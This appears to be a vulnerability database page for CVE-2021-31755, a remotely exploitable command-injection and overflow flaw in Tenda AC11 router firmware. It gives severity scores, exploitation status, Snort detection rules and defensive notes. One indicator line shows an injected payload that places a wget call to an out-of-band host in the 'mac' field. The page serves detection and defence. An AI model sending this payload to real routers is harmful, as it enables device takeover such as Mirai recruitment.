cbcvebase.
CVE-2021-31755
published 2021-05-07

CVE-2021-31755: An issue was discovered on Tenda AC11 devices with firmware through 02.03.01.104_CN. A stack buffer overflow vulnerability in /goform/setmac allows attackers…

PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2021-11-17
Exploited in the wild
EPSS
85.85%
99.7th percentile
An issue was discovered on Tenda AC11 devices with firmware through 02.03.01.104_CN. A stack buffer overflow vulnerability in /goform/setmac allows attackers to execute arbitrary code on the system via a crafted post request.

Affected

1 ranges
VendorProductVersion rangeFixed in
tendaac11_firmware<= 02.03.01.104_cn

Detection & IOCsextracted from sources · hover to see the quote

path/goform/setmac
commandmac=wget+http://{{interactsh-url}}
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Trenda Router AC11 RCE Inbound (CVE-2021-31755)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/setmac"; fast_pattern; http.request_body; content:"&mac="; reference:url,www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; reference:url,github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-31755.yaml; reference:cve,2021-31755; classtype:attempted-admin; sid:2033284; rev:5; metadata:attack_target Networking_Equipment, tls_state plaintext, created_at 2021_07_08, cve CVE_2021_31755, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_10_21, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
snort
alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT Trenda Router AC11 RCE Outbound (CVE-2021-31755)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/setmac"; fast_pattern; http.request_body; content:"&mac="; content:"|3b|"; within:40; reference:url,www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; reference:cve,2021-31755; classtype:attempted-admin; sid:2033285; rev:2; metadata:created_at 2021_07_08, cve CVE_2021_31755, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
  • Exploit targets HTTP POST to /goform/setmac with a crafted `mac=` parameter containing shell metacharacters (e.g., semicolon 0x3b) or OS commands such as wget; inspect the request body for `&mac=` followed by non-MAC-address content within 40 bytes.
  • Inbound exploitation attempts arrive as unauthenticated POST requests to /goform/setmac; no prior authentication is required, so any such POST from an external source should be treated as suspicious.
  • Outbound callback (OOB/OAST) via wget to an attacker-controlled host is a reliable indicator of successful exploitation; monitor for unexpected outbound HTTP from router management IPs.
  • Nuclei template uses interactsh OOB interaction confirmation (HTTP protocol response) as the positive match condition for exploitation.
  • Associated with Mirai botnet campaigns; detections should be correlated with known Mirai IoT exploitation activity.
  • ·Vulnerable firmware version is 02.03.01.104_CN and below; detections should be scoped to Tenda AC11 devices running this firmware range.
  • ·The ET Inbound rule (sid:2033284) targets plaintext HTTP only (tls_state plaintext); encrypted management interfaces would not be covered by this signature.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.